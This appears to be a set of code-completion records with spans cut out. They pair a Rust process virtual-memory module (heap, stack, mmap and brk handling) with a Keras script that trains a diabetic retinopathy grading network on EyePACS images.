Self::init_elf_memory(&elf_range, elf_file).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
trace!("elf range = {:?}", elf_range);
elf_ranges.push(elf_range);
Ok(())
})
.collect::<Result<()>>()?;
// Init the heap memory in the process
let heap_layout = &other_layouts[0];
let vm_option = VMMapOptionsBuilder::default()
.size(heap_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (heap_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(heap_range.start() % heap_layout.align() == 0);
trace!("heap range = {:?}", heap_range);
let brk = RwLock::new(heap_range.start());
chunks.insert(chunk_ref);
// Init the stack memory in the process
let stack_layout = &other_layouts[1];
let vm_option = VMMapOptionsBuilder::default()
.size(stack_layout.size())
.align(heap_layout.align())
.perms(VMPerms::READ | VMPerms::WRITE)
.build()
.map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
let (stack_range, chunk_ref) = USER_SPACE_VM_MANAGER.alloc(&vm_option).map_err(|e| {
&self.handle_error_when_init(&chunks);
e
})?;
debug_assert!(stack_range.start() % stack_layout.align() == 0);
chunks.insert(chunk_ref);
trace!("stack range = {:?}", stack_range);
let mem_chunks = Arc::new(RwLock::new(chunks));
Ok(ProcessVM {
elf_ranges,
heap_range,
stack_range,
brk,
mem_chunks,
})
}
fn validate(&self) -> Result<()> {
let validate_size = |size_opt| -> Result<()> {
if let Some(size) = size_opt {
if size == 0 || size % PAGE_SIZE != 0 {
return_errno!(EINVAL, "invalid size");
}
}
Ok(())
};
validate_size(self.heap_size)?;
validate_size(self.stack_size)?;
validate_size(self.mmap_size)?;
Ok(())
}
fn handle_error_when_init(&self, chunks: &HashSet<Arc<Chunk>>) {
chunks.iter().for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(chunk, None, false);
});
}
fn init_elf_memory(elf_range: &VMRange, elf_file: &ElfFile) -> Result<()> {
// Destination buffer: ELF appeared in the process
let elf_proc_buf = unsafe { elf_range.as_slice_mut() };
// Source buffer: ELF stored in the ELF file
let elf_file_buf = elf_file.as_slice();
let base_load_address_offset = elf_file.base_load_address_offset() as usize;
// Offsets to track zerolized range
let mut empty_start_offset = 0;
let mut empty_end_offset = 0;
// Init all loadable segments
elf_file
.program_headers()
.filter(|segment| segment.loadable())
.for_each(|segment| {
let file_size = segment.p_filesz as usize;
let file_offset = segment.p_offset as usize;
let mem_addr = segment.p_vaddr as usize;
let mem_size = segment.p_memsz as usize;
let alignment = segment.p_align as usize;
debug_assert!(file_size <= mem_size);
let mem_start_offset = mem_addr - base_load_address_offset;
// Initialize empty part to zero based on alignment
empty_start_offset = align_down(mem_start_offset, alignment);
for b in &mut elf_proc_buf[empty_start_offset..mem_start_offset] {
*b = 0;
}
// Bytes of file_size length are loaded from the ELF file
elf_file.file_ref().read_at(
file_offset,
&mut elf_proc_buf[mem_start_offset..mem_start_offset + file_size],
);
// Set the remaining part to zero based on alignment
debug_assert!(file_size <= mem_size);
empty_end_offset = align_up(mem_start_offset + mem_size, alignment);
for b in &mut elf_proc_buf[mem_start_offset + file_size..empty_end_offset] {
*b = 0;
}
});
Ok(())
}
}
// MemChunks is the structure to track all the chunks which are used by this process.
type MemChunks = Arc<RwLock<HashSet<ChunkRef>>>;
/// The per-process virtual memory
#[derive(Debug)]
pub struct ProcessVM {
elf_ranges: Vec<VMRange>,
heap_range: VMRange,
stack_range: VMRange,
brk: RwLock<usize>,
// Memory safety notes: the mem_chunks field must be the last one.
//
// Rust drops fields in the same order as they are declared. So by making
// mem_chunks the last field, we ensure that when all other fields are
// dropped, their drop methods (if provided) can still access the memory
// region represented by the mem_chunks field.
mem_chunks: MemChunks,
}
impl Default for ProcessVM {
fn default() -> ProcessVM {
ProcessVM {
elf_ranges: Default::default(),
heap_range: Default::default(),
stack_range: Default::default(),
brk: Default::default(),
mem_chunks: Arc::new(RwLock::new(HashSet::new())),
}
}
}
impl Drop for ProcessVM {
fn | (&mut self) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
// There are two cases when this drop is called:
// (1) Process exits normally and in the end, drop process VM
// (2) During creating process stage, process VM is ready but there are some other errors when creating the process, e.g. spawn_attribute is set
// to a wrong value
//
// For the first case, the process VM is cleaned in the exit procedure and nothing is needed. For the second cases, mem_chunks is not empty and should
// be cleaned here.
mem_chunks
.drain_filter(|chunk| chunk.is_single_vma())
.for_each(|chunk| {
USER_SPACE_VM_MANAGER
.internal()
.munmap_chunk(&chunk, None, false);
});
assert!(mem_chunks.len() == 0);
info!("Process VM dropped");
}
}
impl ProcessVM {
pub fn mem_chunks(&self) -> &MemChunks {
&self.mem_chunks
}
pub fn stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn add_mem_chunk(&self, chunk: ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.insert(chunk);
}
pub fn remove_mem_chunk(&self, chunk: &ChunkRef) {
let mut mem_chunks = self.mem_chunks.write().unwrap();
mem_chunks.remove(chunk);
}
pub fn replace_mem_chunk(&self, old_chunk: &ChunkRef, new_chunk: ChunkRef) {
self.remove_mem_chunk(old_chunk);
self.add_mem_chunk(new_chunk)
}
// Try merging all connecting single VMAs of the process.
// This is a very expensive operation.
pub fn merge_all_single_vma_chunks(
mem_chunks: &mut RwLockWriteGuard<HashSet<ChunkRef>>,
) -> Result<Vec<VMArea>> {
// Get all single VMA chunks
// Shared chunks shouldn't be merged since they are managed by shm manager and shared by multi processes
let mut single_vma_chunks = mem_chunks
.drain_filter(|chunk| chunk.is_single_vma() && !chunk.is_shared())
.collect::<Vec<ChunkRef>>();
single_vma_chunks.sort_unstable_by(|chunk_a, chunk_b| {
chunk_a
.range()
.start()
.partial_cmp(&chunk_b.range().start())
.unwrap()
});
// Try merging connecting single VMA chunks
for chunks in single_vma_chunks.windows(2) {
let chunk_a = &chunks[0];
let chunk_b = &chunks[1];
let mut vma_a = match chunk_a.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
let mut vma_b = match chunk_b.internal() {
ChunkType::MultiVMA(_) => {
unreachable!();
}
ChunkType::SingleVMA(vma) => vma.lock().unwrap(),
};
if VMArea::can_merge_vmas(&vma_a, &vma_b) {
let new_start = vma_a.start();
vma_b.set_start(new_start);
// set vma_a to zero
vma_a.set_end(new_start);
}
}
// Collect merged vmas which will be the output of this function
let mut merged_vmas = Vec::new();
// Insert unchanged chunks back to mem_chunks list and collect merged vmas for output
for chunk in single_vma_chunks.into_iter().filter_map(|chunk| {
if !chunk.is_single_dummy_vma() {
if chunk.is_single_vma_with_conflict_size() {
let new_vma = chunk.get_vma_for_single_vma_chunk().clone();
merged_vmas.push(new_vma);
// Don't insert the merged chunks to mem_chunk list here. It should be updated later.
None
} else {
Some(chunk)
}
} else {
None
}
}) {
mem_chunks.insert(chunk);
}
Ok(merged_vmas)
}
pub fn get_process_range(&self) -> &VMRange {
USER_SPACE_VM_MANAGER.range()
}
pub fn get_elf_ranges(&self) -> &[VMRange] {
&self.elf_ranges
}
pub fn get_heap_range(&self) -> &VMRange {
&self.heap_range
}
pub fn get_stack_range(&self) -> &VMRange {
&self.stack_range
}
pub fn get_base_addr(&self) -> usize {
self.get_process_range().start()
}
pub fn get_stack_base(&self) -> usize {
self.get_stack_range().end()
}
pub fn get_stack_limit(&self) -> usize {
self.get_stack_range().start()
}
pub fn get_brk(&self) -> usize {
*self.brk.read().unwrap()
}
pub fn brk(&self, brk: usize) -> Result<usize> {
let heap_start = self.heap_range.start();
let heap_end = self.heap_range.end();
// Acquire lock first to avoid data-race.
let mut brk_guard = self.brk.write().unwrap();
if brk >= heap_start && brk <= heap_end {
// Get page-aligned brk address.
let new_brk = align_up(brk, PAGE_SIZE);
// Get page-aligned old brk address.
let old_brk = align_up(*brk_guard, PAGE_SIZE);
// Reset the memory when brk shrinks.
if new_brk < old_brk {
let shrink_brk_range =
VMRange::new(new_brk, old_brk).expect("shrink brk range must be valid");
USER_SPACE_VM_MANAGER.reset_memory(shrink_brk_range)?;
}
// Return the user-specified brk address without page aligned. This is same as Linux.
*brk_guard = brk;
Ok(brk)
} else {
if brk < heap_start {
error!("New brk address is too low");
} else if brk > heap_end {
error!("New brk address is too high");
}
Ok(*brk_guard)
}
}
// Get a NON-accurate free size for current process
pub fn get_free_size(&self) -> usize {
let chunk_free_size = {
let process_chunks = self.mem_chunks.read().unwrap();
process_chunks
.iter()
.fold(0, |acc, chunks| acc + chunks.free_size())
};
let free_size = chunk_free_size + USER_SPACE_VM_MANAGER.free_size();
free_size
}
pub fn mmap(
&self,
addr: usize,
size: usize,
perms: VMPerms,
flags: MMapFlags,
fd: FileDesc,
offset: usize,
) -> Result<usize> {
let addr_option = {
if flags.contains(MMapFlags::MAP_FIXED) {
VMMapAddr::Force(addr)
} else {
if addr == 0 {
VMMapAddr::Any
} else {
VMMapAddr::Hint(addr)
}
}
};
let initializer = {
if flags.contains(MMapFlags::MAP_ANONYMOUS) {
// There is no need to fill zeros in mmap. Cleaning is done after munmap.
VMInitializer::DoNothing()
} else {
let file_ref = current!().file(fd)?;
// Only shared, file-backed memory mappings have write-back files
let need_write_back = if flags.contains(MMapFlags::MAP_SHARED) {
true
} else {
false
};
VMInitializer::FileBacked {
file: FileBacked::new(file_ref, offset, need_write_back),
}
}
};
let mmap_options = VMMapOptionsBuilder::default()
.size(size)
.addr(addr_option)
.perms(perms)
.initializer(initializer)
.build()?;
let mmap_addr = USER_SPACE_VM_MANAGER.mmap(&mmap_options)?;
Ok(mmap_addr)
}
pub fn mremap(
&self,
old_addr: usize,
old_size: usize,
new_size: usize,
flags: MRemapFlags,
) -> Result<usize> {
let mremap_option = VMRemapOptions::new(old_addr, old_size, new_size, flags)?;
USER_SPACE_VM_MANAGER.mremap(&mremap_option)
}
pub fn munmap(&self, addr: usize, size: usize) -> Result<()> {
USER_SPACE_VM_MANAGER.munmap(addr, size)
}
pub fn mprotect(&self, addr: usize, size: usize, perms: VMPerms) -> Result<()> {
let size = {
if size == 0 {
return Ok(());
}
align_up(size, PAGE_SIZE)
};
let protect_range = VMRange::new_with_size(addr, size)?;
return USER_SPACE_VM_MANAGER.mprotect(addr, size, perms);
}
pub fn msync(&self, addr: usize, size: usize) -> Result<()> {
return USER_SPACE_VM_MANAGER.msync(addr, size);
}
pub fn msync_by_file(&self, sync_file: &FileRef) {
return USER_SPACE_VM_MANAGER.msync_by_file(sync_file);
}
// Return: a copy of the found region
pub fn find_mmap_region(&self, addr: usize) -> Result<VMRange> {
USER_SPACE_VM_MANAGER.find_mmap_region(addr)
}
}
bitflags! {
pub struct MMapFlags : u32 {
const MAP_FILE = 0x0;
const MAP_SHARED = 0x1;
const MAP_PRIVATE = 0x2;
const MAP_SHARED_VALIDATE = 0x3;
const MAP_TYPE = 0xf;
const MAP_FIXED = 0x10;
const MAP_ANONYMOUS = 0x20;
const MAP_GROWSDOWN = 0x100;
const MAP_DENYWRITE = 0x800;
const MAP_EXECUTABLE = 0x1000;
const MAP_LOCKED = 0x2000;
const MAP_NORESERVE = 0x4000;
const MAP_POPULATE = 0x8000;
const MAP_NONBLOCK = 0x10000;
const MAP_STACK = 0x20000;
const MAP_HUGETLB = 0x40000;
const MAP_SYNC = 0x80000;
const MAP_FIXED_NOREPLACE = 0x100000;
}
}
impl MMapFlags {
pub fn from_u32(bits: u32) -> Result<MMapFlags> {
// TODO: detect non-supporting flags
MMapFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "unknown mmap flags"))
}
}
// TODO: Support MREMAP_DONTUNMAP flag (since Linux 5.7)
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum MRemapFlags {
None,
MayMove,
FixedAddr(usize),
}
impl MRemapFlags {
pub fn from_raw(raw_flags: u32, new_addr: usize) -> Result<Self> {
const MREMAP_NONE: u32 = 0;
const MREMAP_MAYMOVE: u32 = 1;
const MREMAP_FIXED: u32 = 3;
#[deny(unreachable_patterns)]
let flags = match raw_flags {
MREMAP_NONE => Self::None,
MREMAP_MAYMOVE => Self::MayMove,
MREMAP_FIXED => Self::FixedAddr(new_addr),
_ => return_errno!(EINVAL, "unsupported flags"),
};
Ok(flags)
}
pub fn new_addr(&self) -> Option<usize> {
match self {
MRemapFlags::FixedAddr(new_addr) => Some(*new_addr),
_ => None,
}
}
}
impl Default for MRemapFlags {
fn default() -> Self {
MRemapFlags::None
}
}
bitflags! {
pub struct MSyncFlags : u32 {
const MS_ASYNC = 0x1;
const MS_INVALIDATE = 0x2;
const MS_SYNC = 0x4;
}
}
impl MSyncFlags {
pub fn from_u32(bits: u32) -> Result<Self> {
let flags =
MSyncFlags::from_bits(bits).ok_or_else(|| errno!(EINVAL, "containing unknown bits"))?;
if flags.contains(Self::MS_ASYNC | Self::MS_SYNC) {
return_errno!(EINVAL, "must be either sync or async");
}
Ok(flags)
}
}
| drop | identifier_name |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed)
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def | ():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name))
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa')
plt.xlabel('epoch')
plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | get_experiment_id | identifier_name |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
|
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def get_experiment_id():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
